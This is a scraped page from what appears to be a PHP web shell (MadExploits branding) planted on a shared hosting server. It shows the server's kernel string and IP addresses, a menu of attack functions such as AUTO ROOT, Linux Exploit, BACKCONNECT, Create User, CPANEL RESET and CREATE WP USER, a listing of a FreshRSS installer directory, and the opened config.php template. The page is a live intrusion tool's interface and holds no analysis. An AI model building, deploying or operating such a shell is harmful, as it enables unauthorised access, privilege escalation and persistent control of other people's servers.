Linux host17.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 199.188.200.68 | : 216.73.216.167
Cant Read [ /etc/named.conf ]
8.1.33
shipvipnc2024
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
freshrss /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_config.php
3.07
KB
-rw-r--r--
_config.php.bak.php
99
B
-rw-r--r--
clone.php
4.9
KB
-rw-r--r--
config.php
1.97
KB
-rw-r--r--
config.php.bak.php
391
B
-rw-r--r--
edit.php
4.37
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
9.96
KB
-rw-r--r--
fileindex.php
592
B
-rw-r--r--
freshrss.sql
7.01
KB
-rw-r--r--
freshrss.zip
4.86
MB
-rw-r--r--
import.php
3.2
KB
-rw-r--r--
info.xml
2.68
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.21
KB
-rw-r--r--
install.xml
1.68
KB
-rw-r--r--
md5
3.35
KB
-rw-r--r--
notes.txt
747
B
-rw-r--r--
randomstring.txt
37
B
-rw-r--r--
update_pass.php
519
B
-rw-r--r--
upgrade.php
3.62
KB
-rw-r--r--
upgrade.xml
332
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php return array ( 'environment' => 'production', 'salt' => '[[salt]]', 'base_url' => '[[softurl]]/p', 'auto_update_url' => 'https://update.freshrss.org', 'language' => 'en', 'title' => 'FreshRSS', 'meta_description' => '', 'logo_html' => '', 'default_user' => '[[admin_username]]', 'force_email_validation' => false, 'allow_anonymous' => false, 'allow_anonymous_refresh' => false, 'auth_type' => 'form', 'reauth_required' => true, 'reauth_time' => 1200, 'http_auth_auto_register' => true, 'http_auth_auto_register_email_field' => '', 'api_enabled' => false, 'unsafe_autologin_enabled' => false, 'suppress_csp_warning' => false, 'simplepie_syslog_enabled' => true, 'pubsubhubbub_enabled' => true, 'allow_robots' => false, 'allow_referrer' => false, 'nb_parallel_refresh' => 10, 'limits' => array ( 'cookie_duration' => 7776000, 'cache_duration' => 800, 'cache_duration_min' => 60, 'cache_duration_max' => 86400, 'retry_after_default' => 1500, 'retry_after_max' => 172800, 'timeout' => 20, 'max_inactivity' => 9223372036854775807, 'max_feeds' => 131072, 'max_categories' => 16384, 'max_registrations' => 1, 'max_favicon_upload_size' => 1048576, ), 'curl_options' => array ( ), 'db' => array ( 'type' => 'mysql', 'host' => '[[softdbhost]]', 'user' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'base' => '[[softdb]]', 'prefix' => '[[dbprefix]]', 'connection_uri_params' => '', 'pdo_options' => array ( ), ), 'mailer' => 'mail', 'smtp' => array ( 'hostname' => '', 'host' => 'localhost', 'port' => 25, 'auth' => false, 'auth_type' => '', 'username' => '', 'password' => '', 'secure' => '', 'from' => 'root@localhost', ), 'extensions_enabled' => array ( ), 'extensions' => array ( ), 'disable_update' => false, 'trusted_sources' => array ( 0 => '127.0.0.0/8', 1 => '::1/128', ), );
Close